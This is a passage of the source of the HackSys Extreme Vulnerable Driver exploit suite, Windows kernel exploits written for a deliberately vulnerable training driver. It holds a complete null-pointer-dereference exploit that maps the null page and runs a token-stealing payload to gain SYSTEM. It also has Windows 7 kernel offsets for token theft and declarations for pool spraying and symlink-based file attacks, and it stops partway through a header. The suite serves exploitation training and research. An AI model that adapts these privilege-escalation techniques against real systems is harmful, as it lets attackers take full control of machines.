52 | Level3
53 | MaxSpeed
54 | true
55 | true
56 |
57 |
58 | true
59 | true
60 | true
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 |
86 |
87 |
88 |
89 |
90 |
91 |
92 |
93 |
94 |
95 |
96 |
97 |
98 |
99 |
100 |
101 |
--------------------------------------------------------------------------------
/Exploit/HackSysEVDExploit.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 | Source Files
23 |
24 |
25 | Source Files
26 |
27 |
28 | Source Files
29 |
30 |
31 | Source Files
32 |
33 |
34 | Source Files
35 |
36 |
37 | Source Files
38 |
39 |
40 | Source Files
41 |
42 |
43 | Source Files
44 |
45 |
46 | Source Files
47 |
48 |
49 | Source Files
50 |
51 |
52 | Source Files
53 |
54 |
55 | Source Files
56 |
57 |
58 | Source Files
59 |
60 |
61 | Source Files
62 |
63 |
64 |
65 |
66 | Header Files
67 |
68 |
69 | Header Files
70 |
71 |
72 | Header Files
73 |
74 |
75 | Header Files
76 |
77 |
78 | Header Files
79 |
80 |
81 | Header Files
82 |
83 |
84 | Header Files
85 |
86 |
87 | Header Files
88 |
89 |
90 | Header Files
91 |
92 |
93 | Header Files
94 |
95 |
96 | Header Files
97 |
98 |
99 | Header Files
100 |
101 |
102 | Header Files
103 |
104 |
105 | Header Files
106 |
107 |
108 | Header Files
109 |
110 |
111 | Header Files
112 |
113 |
114 |
--------------------------------------------------------------------------------
/Exploit/InsecureKernelResourceAccess.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver Exploit
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see .
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | InsecureKernelResourceAccess.h
44 |
45 | Abstract:
46 | This module implements the data structures used by the
47 | exploit for Insecure Kernel Resource Access Vulnerability
48 | implemented in HackSys Extreme Vulnerable Driver.
49 |
50 | --*/
51 |
52 | #ifndef __INSECURE_KERNEL_RESOURCE_ACCESS_H__
53 | #define __INSECURE_KERNEL_RESOURCE_ACCESS_H__
54 |
55 | #pragma once
56 |
57 | #include "Common.h"
58 |
59 | VOID LaunchWMIProcess();
60 | VOID WritePayloadDll(LPCTSTR szPath);
61 | NTSTATUS SetProcessDeviceMap(HANDLE DirectoryHandle);
62 | HANDLE OpenObjectDirectory(HANDLE hRoot, LPCWSTR DirectoryName);
63 | HANDLE CreateObjectDirectory(HANDLE hRoot, LPCWSTR DirectoryName);
64 | DWORD WINAPI InsecureKernelFileAccessThread(LPVOID Parameter);
65 | HANDLE CreateSymlink(HANDLE hRoot, LPCWSTR SymbolicLinkName, LPCWSTR TargetName);
66 |
67 | #endif //__INSECURE_KERNEL_RESOURCE_ACCESS_H__
68 |
--------------------------------------------------------------------------------
/Exploit/IntegerOverflow.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver Exploit
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see .
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | IntegerOverflow.h
44 |
45 | Abstract:
46 | This module implements the data structures used by the
47 | exploit for Integer Overflow Vulnerability implemented
48 | in HackSys Extreme Vulnerable Driver.
49 |
50 | --*/
51 |
52 | #ifndef __INTEGER_OVERFLOW_H__
53 | #define __INTEGER_OVERFLOW_H__
54 |
55 | #pragma once
56 |
57 | #include "Common.h"
58 |
59 | #define RET_OVERWRITE_INTEGER 11
60 | #define BUFFER_TERMINATOR 1
61 |
62 | DWORD WINAPI IntegerOverflowThread(LPVOID Parameter);
63 |
64 | #endif //__INTEGER_OVERFLOW_H__
65 |
--------------------------------------------------------------------------------
/Exploit/NullPointerDereference.c:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver Exploit
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see .
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | NullPointerDereference.c
44 |
45 | Abstract:
46 | This module implements the exploit for Null Pointer
47 | Dereference Vulnerability implemented in HackSys Extreme
48 | Vulnerable Driver.
49 |
50 | --*/
51 |
52 | #include "NullPointerDereference.h"
53 |
54 | DWORD WINAPI NullPointerDereferenceThread(LPVOID Parameter) {
55 | HANDLE hFile = NULL;
56 | ULONG BytesReturned;
57 | ULONG MagicValue = 0xBAADF00D;
58 | PVOID NullPointerPlus4 = NULL;
59 | PVOID NullPageBaseAddress = NULL;
60 | LPCSTR FileName = (LPCSTR)DEVICE_NAME;
61 | PVOID EopPayload = &TokenStealingPayloadWin7Generic;
62 |
63 | __try {
64 | // Get the device handle
65 | DEBUG_MESSAGE("\t[+] Getting Device Driver Handle\n");
66 | DEBUG_INFO("\t\t[+] Device Name: %s\n", FileName);
67 |
68 | hFile = GetDeviceHandle(FileName);
69 |
70 | if (hFile == INVALID_HANDLE_VALUE) {
71 | DEBUG_ERROR("\t\t[-] Failed Getting Device Handle: 0x%X\n", GetLastError());
72 | exit(EXIT_FAILURE);
73 | }
74 | else {
75 | DEBUG_INFO("\t\t[+] Device Handle: 0x%X\n", hFile);
76 | }
77 |
78 | DEBUG_MESSAGE("\t[+] Setting Up Vulnerability Stage\n");
79 |
80 | DEBUG_INFO("\t\t[+] Mapping Null Page\n");
81 |
82 | if (!MapNullPage()) {
83 | DEBUG_ERROR("\t\t[-] Failed Mapping Null Page: 0x%X\n", GetLastError());
84 | exit(EXIT_FAILURE);
85 | }
86 |
87 | DEBUG_INFO("\t\t[+] Preparing Null Page Memory Layout\n");
88 |
89 | NullPointerPlus4 = (PVOID)((ULONG)NullPageBaseAddress + 0x4);
90 |
91 | // Now set the function pointer
92 | *(PULONG)NullPointerPlus4 = (ULONG)EopPayload;
93 |
94 | DEBUG_INFO("\t\t\t[+] NullPage+0x4 Value: 0x%p\n", *(PULONG)NullPointerPlus4);
95 | DEBUG_INFO("\t\t\t[+] NullPage+0x4 Address: 0x%p\n", NullPointerPlus4);
96 |
97 | DEBUG_INFO("\t\t[+] EoP Payload: 0x%p\n", EopPayload);
98 |
99 | DEBUG_MESSAGE("\t[+] Triggering Null Pointer Dereference\n");
100 |
101 | OutputDebugString("****************Kernel Mode****************\n");
102 |
103 | DeviceIoControl(hFile,
104 | HACKSYS_EVD_IOCTL_NULL_POINTER_DEREFERENCE,
105 | (LPVOID)&MagicValue,
106 | 0,
107 | NULL,
108 | 0,
109 | &BytesReturned,
110 | NULL);
111 |
112 | OutputDebugString("****************Kernel Mode****************\n");
113 | }
114 | __except (EXCEPTION_EXECUTE_HANDLER) {
115 | DEBUG_ERROR("\t\t[-] Exception: 0x%X\n", GetLastError());
116 | exit(EXIT_FAILURE);
117 | }
118 |
119 | return EXIT_SUCCESS;
120 | }
121 |
--------------------------------------------------------------------------------
/Exploit/NullPointerDereference.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver Exploit
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see .
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | NullPointerDereference.h
44 |
45 | Abstract:
46 | This module implements the data structures used by the
47 | exploit for Null Pointer Dereference Vulnerability
48 | implemented in HackSys Extreme Vulnerable Driver.
49 |
50 | --*/
51 |
52 | #ifndef __NULL_POINTER_DEREFERENCE_H__
53 | #define __NULL_POINTER_DEREFERENCE_H__
54 |
55 | #pragma once
56 |
57 | #include "Common.h"
58 |
59 | DWORD WINAPI NullPointerDereferenceThread(LPVOID Parameter);
60 |
61 | #endif //__NULL_POINTER_DEREFERENCE_H__
62 |
--------------------------------------------------------------------------------
/Exploit/Payloads.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver Exploit
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see .
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | Payloads.h
44 |
45 | Abstract:
46 | This module implements the data structures used by EoP payload.
47 |
48 | --*/
49 |
50 | #ifndef __PAYLOADS_H__
51 | #define __PAYLOADS_H__
52 |
53 | #pragma once
54 |
55 | #include "Common.h"
56 |
57 | // Windows 7 SP1 x86 Offsets
58 | #define KTHREAD_OFFSET 0x124 // nt!_KPCR.PcrbData.CurrentThread
59 | #define EPROCESS_OFFSET 0x050 // nt!_KTHREAD.ApcState.Process
60 | #define PID_OFFSET 0x0B4 // nt!_EPROCESS.UniqueProcessId
61 | #define FLINK_OFFSET 0x0B8 // nt!_EPROCESS.ActiveProcessLinks.Flink
62 | #define TOKEN_OFFSET 0x0F8 // nt!_EPROCESS.Token
63 | #define SYSTEM_PID 0x004 // SYSTEM Process PID
64 |
65 | VOID TokenStealingPayloadWin7();
66 | VOID TokenStealingPayladGSWin7();
67 | VOID TokenStealingPayloadWin7New();
68 | VOID TokenStealingPayloadWin7Generic();
69 | VOID TokenStealingPayloadDuplicateToken();
70 | VOID TokenStealingPayloadPoolOverflowWin7();
71 | VOID TokenStealingPayloadPsReferencePrimaryToken();
72 |
73 | #endif //__PAYLOADS_H__
74 |
--------------------------------------------------------------------------------
/Exploit/PoolOverflow.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver Exploit
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see .
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | PoolOverflow.h
44 |
45 | Abstract:
46 | This module implements the data structures used by the
47 | exploit for Pool Overflow Vulnerability implemented in
48 | HackSys Extreme Vulnerable Driver.
49 |
50 | --*/
51 |
52 | #ifndef __POOL_OVERFLOW_H__
53 | #define __POOL_OVERFLOW_H__
54 |
55 | #pragma once
56 |
57 | #include "Common.h"
58 |
59 | #define POOL_BUFFER_SIZE 504
60 | #define TYPE_INDEX_OVERWRITE 40
61 |
62 | HANDLE EventObjectArrayA[10000];
63 | HANDLE EventObjectArrayB[5000];
64 |
65 | VOID FreeEventObjects();
66 | VOID SprayNonPagedPoolWithEventObjects();
67 | DWORD WINAPI PoolOverflowThread(LPVOID Parameter);
68 | VOID CreateHolesInNonPagedPoolByCoalescingEventObjects();
69 |
70 | #endif //__POOL_OVERFLOW_H__
71 |
--------------------------------------------------------------------------------
/Exploit/StackOverflow.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver Exploit
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see .
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | StackOverflow.h
44 |
45 | Abstract:
46 | This module implements the data structures used by the
47 | exploit for Stack Overflow Vulnerability implemented in
48 | HackSys Extreme Vulnerable Driver.
49 |
50 | --*/
51 |
52 | #ifndef __STACK_OVERFLOW_H__
53 | #define __STACK_OVERFLOW_H__
54 |
55 | #pragma once
56 |
57 | #include "Common.h"
58 |
59 | #define RET_OVERWRITE 9
60 |
61 | DWORD WINAPI StackOverflowThread(LPVOID Parameter);
62 |
63 | #endif //__STACK_OVERFLOW_H__
64 |
--------------------------------------------------------------------------------
/Exploit/StackOverflowGS.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver Exploit
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see .
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | StackOverflowGS.h
44 |
45 | Abstract:
46 | This module implements the data structures used by the
47 | exploit for Stack Overflow Vulnerability protected by
48 | GS cookies implemented in HackSys Extreme Vulnerable
49 | Driver.
50 |
51 | --*/
52 |
53 | #ifndef __STACK_OVERFLOW_GS_H__
54 | #define __STACK_OVERFLOW_GS_H__
55 |
56 | #pragma once
57 |
58 | #include "Common.h"
59 |
60 | #define RAISE_EXCEPTION_IN_KERNEL_MODE 0x4
61 | #define SHARED_MEMORY_NAME "HackSysExtremeVulnerableDriverSharedMemory"
62 |
63 | DWORD WINAPI StackOverflowGSThread(LPVOID Parameter);
64 |
65 | #endif //__STACK_OVERFLOW_GS_H__
66 |
--------------------------------------------------------------------------------
/Exploit/TypeConfusion.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver Exploit
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see .
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
